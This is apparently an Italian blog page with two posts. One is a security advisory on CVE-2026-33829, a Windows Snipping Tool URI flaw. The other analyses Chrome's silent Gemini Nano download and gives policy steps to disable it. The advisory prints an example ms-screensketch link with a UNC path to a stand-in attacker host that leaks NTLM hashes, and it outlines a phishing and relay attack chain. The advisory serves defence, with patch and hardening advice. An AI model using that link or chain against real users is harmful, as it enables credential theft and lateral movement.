ADS

giovedì 7 maggio 2026

CVE-2026-33829 - Lo Snipping Tool che regala il tuo hash NTLM

Il succo della faccenda: clicci su un link, si apre lo Strumento di cattura di Windows come se niente fosse, e nel frattempo il tuo hash NTLMv2 (derivato dalla tua password di dominio o account locale) vola silenzioso verso un server controllato dall'attaccante. Nessun warning, nessun popup sospetto, zero sintomi visibili.


La Radice Tecnica

Lo Snipping Tool registra nel sistema un URI handler personalizzato chiamato ms-screensketch: (e ms-screenclip:), usato per aprire direttamente l'app tramite link dal browser o da altre app. Questo URI accetta un parametro filePath per indicare il file da aprire/modificare.

Il problema è brutalmente semplice: non c'è alcuna validazione del parametro filePath. Un attaccante può passargli un UNC path invece di un percorso locale:

Esempio:

ms-screensketch:edit?filePath=\\\\attacker.evil.com\\share\\badge.png

Quando Windows vede un percorso UNC (\\server\share\file), fa automaticamente una connessione SMB verso quel server. E quando apre una connessione SMB autenticata, trasmette automaticamente la risposta Net-NTLMv2 - ovvero un hash crittografico derivato dalla tua password - al server remoto.

Ecco un esempio fatto semplicemente su una cartella mappata:




La Catena d'Attacco (Attack Chain)

  1. Preparazione: L'attaccante mette in piedi un server SMB malevolo (es. con Responder) e crea un link ms-screensketch: con UNC path che punta a quel server

  2. Delivery: La vittima riceve il link via phishing email, pagina web compromessa, o messaggio Teams/Slack — mascherato da qualcosa di plausibile (es. "ritaglia la tua foto per il badge aziendale")

  3. Esecuzione: La vittima clicca e conferma l'apertura dello Strumento di cattura (unica interazione richiesta)

  4. Esfiltrazione silenziosa: Lo Snipping Tool tenta di caricare il file remoto via SMB → Windows invia automaticamente l'hash Net-NTLMv2 all'attaccante

  5. Post-exploitation: L'hash può essere:

    • Craccato offline con Hashcat/John the Ripper per recuperare la password in chiaro

    • Usato direttamente in un attacco NTLM Relay per autenticarsi ad altri servizi interni senza neanche craccare


Dati della Vulnerabilità

CampoDettaglio
CVECVE-2026-33829 nvd.nist
CVSS 3.14.3 (Medium) technochat
CWECWE-200 – Exposure of Sensitive Information
ComponenteWindows Snipping Tool (ms-screensketch: URI)
Scoperta daMarcos Díaz Castiñeiras – BlackArrow (Tarlogic) linkedin
Segnalata a Microsoft23 marzo 2026 redhotcyber
Patch rilasciata14 aprile 2026 (Patch Tuesday) technochat
PoC pubblicoSì, GitHub BlackArrow github

Perché il CVSS 4.3 Sottostima il Rischio Reale

Il punteggio "Medium" può ingannare. In ambienti Active Directory aziendali questo è un cazzo di problema serio per due motivi: [cybersecuritynews]

  • NTLM Relay: In reti dove NTLM non è bloccato/disabilitato e SMB signing non è enforced, l'hash può essere riutilizzato in tempo reale per autenticarsi a file server, SharePoint, Exchange  senza craccare nulla

  • Surface d'attacco enormissima: Lo Snipping Tool è preinstallato su ogni build di Windows, quindi potenzialmente colpisce ogni macchina Windows aziendale non aggiornata

Il MITRE ATT&CK mapping rilevante è T1550.002 – Pass the Hash per il movimento laterale.


Come Proteggersi

Fix immediato (obbligatorio):

  • Installare gli aggiornamenti di sicurezza di aprile 2026 su tutte le macchine Windows [redhotcyber]

Misure di hardening aggiuntive:

  • Bloccare il traffico SMB in uscita (porta 445) al perimetro della rete non dovrebbe mai uscire dall'infrastruttura interna [redhotcyber]

  • Monitorare connessioni SMB anomale in uscita con SIEM/EDR; BlackArrow ha già pubblicato query KQL specifiche per Microsoft Defender XDRx

  • Considerare la disabilitazione di NTLM dove possibile in favore di Kerberos (GPO: Network security: Restrict NTLM)

  • Abilitare SMB Signing obbligatorio su tutti i server per mitigare i relay attack

Per i Blue Team, SOC Prime ha già regole di detection dedicate per questo CVE.


Contesto Storico: Non è la Prima Volta

Questo attacco si inserisce in un pattern più ampio di URI handler abuse su Windows. Già nel 2025 era stata documentata una tecnica analoga con lo schema ms-photos:, e ad aprile 2026 era emerso un bug simile in Explorer (CVE-2026-32202) dove una patch Microsoft aveva essa stessa introdotto un leak di credenziali. Il problema sistemico è che Windows espone decine di URI handler registrati dalle sue app native, e la validazione dell'input in questi handler è storicamente lacunosa.


Verifica protezione

Se hai da WINVER una versione superiore a quella indicata in tabella ... Sei OK!

Versione WindowsBuild minima protettaCome verificare
Win 11 25H226200.8246winver oppure PowerShell
Win 11 24H226100.8246winver oppure PowerShell
Win 11 23H222631.6936winver oppure PowerShell
Win 10 22H219045.5858winver oppure PowerShell

mercoledì 6 maggio 2026

Analisi Tecnica e Geopolitica della Distribuzione Silenziosa di Modelli IA in Google Chrome

Impatto Infrastrutturale, Implicazioni Legali e Strategie di Mitigazione

L'evoluzione del browser web da semplice interprete di protocolli ipertestuali a ecosistema computazionale onnicomprensivo ha raggiunto una nuova soglia critica con l'integrazione nativa di modelli linguistici di grandi dimensioni (LLM) direttamente nell'hardware dell'utente finale. Negli ultimi mesi, un numero crescente di analisi tecniche e segnalazioni da parte di esperti di sicurezza ha evidenziato come Google Chrome abbia iniziato a distribuire in modo silente un file binario di circa 4 gigabyte, denominato weights.bin, all'interno delle directory di sistema dei dispositivi host. Questo file costituisce il nucleo dei parametri addestrati per Gemini Nano, la versione ottimizzata per l'esecuzione locale della famiglia di modelli generativi di Google. La distribuzione di un asset di tali dimensioni, effettuata senza una richiesta esplicita di consenso o una notifica trasparente dell'impatto sullo storage, solleva interrogativi fondamentali sulla sovranità digitale dell'utente e sulla gestione etica delle risorse hardware di terze parti da parte dei grandi fornitori di software.

Il meccanismo di distribuzione si appoggia a un componente interno noto come "Optimization Guide On-Device Model", originariamente concepito per migliorare le prestazioni di caricamento delle pagine tramite euristiche di apprendimento automatico. Tuttavia, con la versione 147 di Chrome, questa infrastruttura è stata riconvertita per fungere da vettore di distribuzione per l'intelligenza artificiale generativa sul dispositivo. Sebbene lo spostamento dell'inferenza dal cloud al dispositivo locale prometta vantaggi in termini di latenza e, teoricamente, di privacy dei dati, le modalità di implementazione — caratterizzate da un'installazione invisibile e da una resilienza aggressiva ai tentativi di rimozione manuale — hanno innescato un acceso dibattito tra i difensori della privacy e gli architetti del software.

Architettura Tecnica del Modello Gemini Nano in Ambiente Chrome

Per comprendere la portata di questo fenomeno, è necessario analizzare l'architettura sottostante che permette a un browser di eseguire modelli di linguaggio complessi. Gemini Nano non è un singolo file statico, ma un sistema dinamico integrato nel framework di esecuzione del browser che interagisce con le API Web AI di recente introduzione.

Il Ruolo della Optimization Guide

La "Optimization Guide" funge da orchestratore centrale per tutte le funzionalità di machine learning all'interno di Chrome. Storicamente, questo componente gestiva modelli di piccole dimensioni per la previsione del caricamento delle risorse o la classificazione delle immagini delle pagine. Con l'avvento di Gemini Nano, la guida è stata potenziata per gestire l'intero ciclo di vita di un LLM: dal download dei pesi (weights) alla verifica dell'integrità, fino alla gestione della memoria durante l'inferenza.

Componente del SistemaFunzione PrincipaleImpatto sulle Risorse
weights.bin

Contiene i parametri binari del modello Gemini Nano.

~4 GB di spazio su disco.

manifest.json

Definisce la versione del modello e i requisiti di sistema.

Trascurabile.
on_device_model_execution_config.pb

Configura i parametri di esecuzione per la GPU o CPU.

Trascurabile.
adapter_cache.bin

Gestisce le personalizzazioni LoRA (Low-Rank Adaptation).

Variabile (fino a centinaia di MB).

Requisiti Hardware e Logica di Rilevamento

Google Chrome non distribuisce indiscriminatamente il modello a tutti gli utenti, ma effettua una scansione preliminare dell'hardware per determinare la compatibilità. Questa scansione è critica poiché l'esecuzione di un LLM può degradare sensibilmente le prestazioni di sistemi non adeguatamente equipaggiati.

I criteri di idoneità per l'installazione automatica includono:

  • Memoria RAM: È richiesto un minimo di 16 GB per l'inferenza basata su CPU.

  • Memoria Video (VRAM): Per l'accelerazione via GPU, il sistema deve disporre di oltre 4 GB di VRAM dedicata.

  • Capacità di Archiviazione: Il sistema verifica la presenza di almeno 22 GB di spazio libero sul volume del profilo prima di avviare il download. Se, dopo l'installazione, lo spazio scende sotto i 10 GB, il browser può attivare una procedura di eliminazione automatica (purge) per preservare la stabilità del sistema operativo.

  • Connettività: Il download viene attivato preferenzialmente su connessioni non a consumo (unmetered), sebbene segnalazioni indichino casi di attivazione anche su reti mobili in assenza di configurazioni restrittive.

Meccanismi di Distribuzione Silenziosa e Ciclo di Vita del File weights.bin

L'installazione del modello avviene tramite il "Chrome Component Updater", un servizio in background che opera indipendentemente dal ciclo di aggiornamento principale del browser. Questo servizio è progettato per garantire che i moduli critici, come le definizioni di Safe Browsing o i moduli DRM Widevine, siano sempre aggiornati senza richiedere l'intervento dell'utente.

Trigger di Download e Resilienza del Processo

L'attivazione del download di 4 GB è spesso innescata dalla prima interazione dell'utente con una delle nuove funzionalità IA, come "Help me write", o dal primo tentativo di un'applicazione web di chiamare funzioni come Summarizer.create() o LanguageModel.create(). Tuttavia, in versioni recenti, il download sembra verificarsi proattivamente anche solo per supportare funzionalità di sicurezza come il rilevamento di truffe e phishing in tempo reale.

La resilienza del processo è uno degli aspetti più controversi. Se un utente identifica il file weights.bin e lo elimina manualmente per liberare spazio, il Component Updater rileverà l'assenza del modulo al riavvio successivo e inizierà immediatamente un nuovo download in background. Questo ciclo di eliminazione e riscaricamento automatico è stato paragonato a comportamenti tipici dei software persistenti non autorizzati. È stato calcolato che il tempo necessario per completare l'intera operazione — dalla creazione della directory al posizionamento finale del binario — è di circa 14 minuti e 28 secondi su connessioni standard.

Struttura delle Directory per Piattaforma

Il file weights.bin risiede in percorsi specifici che variano a seconda del sistema operativo e del metodo di installazione del browser. Individuare queste cartelle è il primo passo per qualsiasi tentativo di analisi o rimozione manuale.

Sistema OperativoPercorso Tipico della Cartella OptGuideOnDeviceModel
Windows 10/11

%LOCALAPPDATA%\Google\Chrome\User Data\OptGuideOnDeviceModel

macOS

~/Library/Application Support/Google/Chrome/OptGuideOnDeviceModel

Linux (deb/rpm)

~/.config/google-chrome/Default/OptGuideOnDeviceModel

Linux (Snap)

~/snap/chromium/common/chromium/Default/OptGuideOnDeviceModel

Linux (Flatpak)

~/.var/app/com.google.Chrome/config/google-chrome/Default/OptGuideOnDeviceModel

All'interno di queste cartelle, il sistema crea sottodirectory basate sulla versione del modello, come 2024.9.25.2033 o simili, rendendo difficile l'automazione della rimozione tramite script statici.

Analisi delle Implicazioni Legali, Etiche e Ambientali

La decisione unilaterale di distribuire un binario da 4 GB a miliardi di utenti solleva criticità che vanno ben oltre la mera occupazione di spazio su disco, toccando ambiti legali e di sostenibilità globale.

Violazione del Consenso e Direttiva ePrivacy

Dal punto di vista legale, l'installazione silente è oggetto di scrutinio in relazione alla Direttiva ePrivacy dell'Unione Europea. Tale normativa stabilisce che l'archiviazione di informazioni (o l'accesso a informazioni già archiviate) nel dispositivo terminale di un utente è consentita solo se l'utente ha espresso il proprio consenso dopo essere stato informato in modo chiaro. Sebbene esistano eccezioni per le funzionalità "strettamente necessarie" alla fornitura di un servizio richiesto, è difficile argomentare che un modello IA da 4 GB sia essenziale per la navigazione web di base. Esperti come Alexander Hanff hanno evidenziato come questo approccio tratti la macchina dell'utente come una "superficie di distribuzione" a disposizione del fornitore, ignorando l'autorità legale del proprietario del dispositivo.

Costo Ambientale e Impronta di Carbonio

Un aspetto spesso trascurato è il costo energetico della distribuzione di dati su questa scala. Spostare exabyte di dati (4 GB moltiplicati per centinaia di milioni di dispositivi idonei) richiede un dispendio energetico massiccio a livello di data center e infrastruttura di rete. Le stime indicano che una singola distribuzione di questo tipo potrebbe generare tra le 6.000 e le 60.000 tonnellate di emissioni di $CO_2$ equivalente.

La formula teorica per il calcolo dell'impatto ambientale di una tale operazione può essere espressa come:

$$EM_{total} = (N_{inst} \times S_{file}) \times E_{net} \times C_{mix}$$

Dove:

  • $EM_{total}$ è l'emissione totale di gas serra.

  • $N_{inst}$ è il numero di istanze di Chrome che ricevono il push.

  • $S_{file}$ è la dimensione del file (4 GB).

  • $E_{net}$ è l'intensità energetica media per GB trasferito (includendo router, server e cavi sottomarini).

  • $C_{mix}$ è il coefficiente di emissione medio del mix energetico globale.

L'ironia sottolineata da molti critici è che gran parte di questo sforzo ambientale è finalizzato a funzionalità che l'utente medio potrebbe non attivare mai o che risiedono in menu profondamente sepolti nelle impostazioni.

Soluzioni e Strategie di Mitigazione per l'Utente

Dato che la semplice cancellazione del file non è una soluzione permanente, gli utenti che desiderano reclamare lo spazio su disco e impedire futuri download devono adottare misure più sofisticate.

Metodo 1: Gestione Tramite la Pagina Interna di Chrome

Google ha integrato una pagina di debug che permette di visualizzare lo stato del modello e, in alcuni casi, di forzarne la disinstallazione.

  1. Digitare chrome://on-device-internals nella barra degli indirizzi.

  2. Verificare la sezione Foundational model state. Se il valore è "Ready", il modello è presente sul disco.

  3. Utilizzare il pulsante Uninstall (se disponibile) per rimuovere il binario.

È importante notare che, senza ulteriori blocchi, il sistema potrebbe comunque tentare il ripristino in futuro se le funzionalità IA rimangono attive.

Metodo 2: Disattivazione delle Funzionalità IA tramite "Flags"

Un metodo accessibile agli utenti domestici consiste nel disabilitare i flag sperimentali che attivano l'infrastruttura di ottimizzazione sul dispositivo.

  1. Accedere a chrome://flags.

  2. Cercare Enables optimization guide on device e impostarlo su Disabled.

  3. Cercare Prompt API for Gemini Nano e impostarlo su Disabled.

  4. Riavviare il browser cliccando su Relaunch.

Sebbene efficace, questo metodo ha il limite di poter essere annullato da Google con futuri aggiornamenti che potrebbero rimuovere o rinominare questi flag.

Metodo 3: Implementazione di Policy Enterprise (Soluzione Definitiva)

Per una protezione permanente, è necessario utilizzare la policy ufficiale GenAILocalFoundationalModelSettings. Questo comando istruisce il browser a ignorare completamente il download del modello locale, prevalendo sulla logica interna del Component Updater.

Configurazione su Windows (Registro di Sistema)

La modifica del registro di sistema è il metodo più robusto per gli utenti Windows che non dispongono di strumenti di gestione centralizzata.

  1. Premere Win + R, digitare regedit e premere Invio.

  2. Navigare verso HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome.

  3. Se le chiavi Google o Chrome non esistono, crearle cliccando con il tasto destro sulla cartella precedente.

  4. Creare un nuovo Valore DWORD (32-bit) chiamato GenAILocalFoundationalModelSettings.

  5. Impostare il valore su 1 per disabilitare permanentemente il download.

  6. Riavviare il computer e procedere alla cancellazione manuale della cartella OptGuideOnDeviceModel per liberare i 4 GB.

Configurazione su macOS

Su sistemi Apple, la policy può essere applicata tramite il terminale per impostare una preferenza di sistema che Chrome è obbligato a rispettare.

  1. Aprire il Terminale.

  2. Eseguire il comando: defaults write com.google.Chrome GenAILocalFoundationalModelSettings -int 1.

  3. Riavviare Chrome e verificare l'applicazione della policy visitando chrome://policy.

Configurazione su Linux

Per gli utenti Linux, la gestione avviene tramite file JSON posizionati nelle directory delle policy di sistema.

  1. Creare la directory delle policy: sudo mkdir -p /etc/opt/chrome/policies/managed.

  2. Creare un file chiamato managed_policies.json con il seguente contenuto:

    {
    "GenAILocalFoundationalModelSettings": 1
    }
  3. Riavviare il browser. Se si utilizza Chromium invece di Google Chrome, il percorso sarà /etc/chromium/policies/managed.

Impatto sull'Esperienza Utente e Diagnostica Avanzata

La disattivazione di Gemini Nano non impedisce la navigazione web standard, ma renderà indisponibili le funzionalità IA che operano localmente. Funzionalità come la "AI Mode" nella barra degli indirizzi potrebbero continuare a funzionare se configurate per utilizzare i server di Google (cloud inference), ma gli strumenti di assistenza alla scrittura o la ricerca avanzata nella cronologia potrebbero cessare di operare.

Diagnostica tramite Event Logs

Per gli amministratori di sistema o gli utenti avanzati, Chrome offre log dettagliati sull'attività dei modelli. Attraverso chrome://on-device-internals, è possibile accedere alla scheda Event Logs. Qui vengono registrati eventi critici come:

  • Model downloading: Indica l'inizio del trasferimento del binario da 4 GB.

  • Model loading error: Spesso legato a VRAM insufficiente o file corrotti.

  • Model purged: Conferma che il browser ha rimosso il modello per mancanza di spazio su disco o per l'applicazione di una policy.

Questi log sono essenziali per confermare se le contromisure applicate (come le policy di registro) stiano effettivamente bloccando i tentativi di download del browser.

Il Fenomeno dei Pesi LoRA (Low-Rank Adaptation)

Oltre al modello base, Chrome gestisce pesi specializzati chiamati LoRA per compiti specifici come la correzione grammaticale avanzata (Proofreader API). Questi file sono significativamente più piccoli di weights.bin ma vengono aggiornati quotidianamente. È stato osservato che se il modello base viene rimosso correttamente tramite le policy sopra descritte, anche il download di questi pesi secondari viene interrotto, riducendo ulteriormente il traffico di rete in background.

Prospettive Future: L'IA come Componente del Sistema Operativo-Browser

L'episodio di Gemini Nano in Chrome è emblematico di una tendenza irreversibile: il "Edge AI". Le aziende tecnologiche stanno spostando il carico computazionale dai propri data center all'hardware dell'utente finale per due ragioni principali: la riduzione dei costi operativi immensi legati all'inferenza cloud e il miglioramento della privacy percepita, mantenendo i dati sensibili sul dispositivo.

Tuttavia, questo spostamento avviene a scapito dell'utente, che si trova a dover finanziare l'esecuzione del software con la propria energia elettrica, il proprio spazio su disco e la longevità dei propri SSD. In futuro, è probabile che vedremo requisiti di sistema per i browser sempre più simili a quelli dei videogiochi moderni, con una "tassa sulle risorse" che penalizzerà gli utenti con hardware datato.

La sfida per i legislatori e gli sviluppatori sarà quella di stabilire standard di trasparenza. Un semplice prompt di installazione — "Chrome vorrebbe scaricare un modello IA da 4 GB per migliorare le tue ricerche. Consenti o salta?" — avrebbe evitato gran parte delle critiche attuali. Finché tale trasparenza non diventerà lo standard, la gestione manuale tramite policy e registri rimarrà l'unica difesa per l'utente consapevole.

Sintesi delle Raccomandazioni Finali

In base all'analisi tecnica condotta, si consigliano le seguenti azioni per risolvere definitivamente la questione dell'occupazione di spazio da parte di Gemini Nano:

  1. Analisi Iniziale: Utilizzare chrome://on-device-internals per confermare se il file da 4 GB è già presente sul sistema.

  2. Blocco Preventivo: Applicare la policy GenAILocalFoundationalModelSettings tramite registro di sistema (Windows) o configurazioni policy (Linux/macOS) prima di procedere alla cancellazione.

  3. Pulizia: Eliminare manualmente la cartella OptGuideOnDeviceModel dai percorsi del profilo utente specificati per recuperare lo spazio.

  4. Monitoraggio: Verificare periodicamente lo stato delle policy tramite chrome://policy per assicurarsi che futuri aggiornamenti del browser non abbiano introdotto nuovi vettori di download silente.

L'adozione di queste misure garantisce il ripristino del controllo sulle risorse del dispositivo, mitigando al contempo i rischi legati alla privacy e l'impatto ambientale associato a questa distribuzione non richiesta.


Su mio device Windows 11 Home con 1TB di disco